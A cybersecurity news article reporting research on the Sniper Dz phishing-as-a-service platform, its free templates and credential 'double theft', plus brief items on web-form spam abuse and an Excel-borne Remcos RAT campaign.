• Posted by: Michael Johnson
• October 01, 2024

More than 140,000 Phishing Websites Found Linked to Sniper Dz PhaaS

Over the past year, more than 140,000 phishing websites have been discovered connected to the Sniper Dz Phishing-as-a-Service (PhaaS) platform, highlighting its widespread use by cybercriminals for credential theft.

"For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," said Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov in a technical report.

"Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers."

What makes it even more appealing to criminals is that the services are offered for free. However, the credentials harvested are also stolen by the operators of the PhaaS platform, a method Microsoft refers to as "double theft."

PhaaS platforms have become a popular entry point for aspiring cybercriminals, making it easier for individuals with little technical knowledge to carry out large-scale phishing attacks.

These phishing kits are often sold on Telegram, where dedicated channels offer everything from hosting services to phishing message distribution.

Sniper Dz operates a Telegram channel with over 7,170 subscribers as of October 1, 2024, which was created on May 25, 2020. Interestingly, a day after the Unit 42 report was released, the channel enabled an auto-delete feature, automatically erasing posts after one month, likely an attempt to cover tracks, although previous messages remain visible.

The PhaaS platform is accessible on the clearnet, where users can sign up for accounts to "get your scams and hack tools," as advertised on the website.

A video uploaded to Vimeo in January 2021 shows that Sniper Dz provides ready-made scam templates for various websites like Facebook, Instagram, Skype, Yahoo, and PayPal, available in English, Arabic, and French. This video has garnered over 67,000 views.

Additionally, The Hacker News identified tutorial videos on YouTube that guide users through setting up fake landing pages for popular games like PUBG and Free Fire on platforms like Google Blogger. It remains unclear if these YouTubers are connected to Sniper Dz's developers or merely customers.

Sniper Dz has the capability to host phishing pages on its own infrastructure and provide unique links to these pages. These phishing sites are often concealed behind a legitimate proxy server (proxymesh[.]com) to evade detection.

"The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications," the researchers noted.

"This technique helps Sniper Dz protect its backend servers since the victim's browser or security crawlers will only see the proxy server as responsible for loading the phishing payload."

Another option for criminals is downloading phishing page templates as HTML files and hosting them on their own servers. Sniper Dz even offers tools to convert these templates into the Blogger format, allowing phishing pages to be hosted on Blogspot domains.

The stolen credentials are displayed on an admin panel, accessible through the clearnet platform. Unit 42 observed a surge in phishing activity leveraging Sniper Dz, primarily targeting U.S. users, beginning in July 2024.

"Sniper Dz phishing pages exfiltrate victim credentials and track them through centralized infrastructure," said the researchers. "This could be assisting Sniper Dz in collecting credentials stolen by phishers using their platform."

This discovery coincides with Cisco Talos revealing attacks abusing web forms linked to backend SMTP infrastructure, such as account creation pages, to bypass spam filters and distribute phishing emails. These attacks exploit poor input validation to insert malicious links and text.

"Many websites allow users to sign up for accounts, triggering an email back to the user for confirmation," said Talos researcher Jaeson Schultz. "In this case, spammers overload the name field with text and links, which aren't validated, causing spam links to appear in the email."

Additionally, a recent email phishing campaign was discovered, leveraging an innocuous Microsoft Excel document to deliver a fileless version of the Remcos RAT, exploiting a security flaw (CVE-2017-0199).

"Opening the Excel file triggers OLE objects to download and execute a malicious HTA application," explained Trellix researcher Trishaan Kalra. "This HTA application launches PowerShell commands that ultimately inject fileless Remcos RAT into a legitimate Windows process."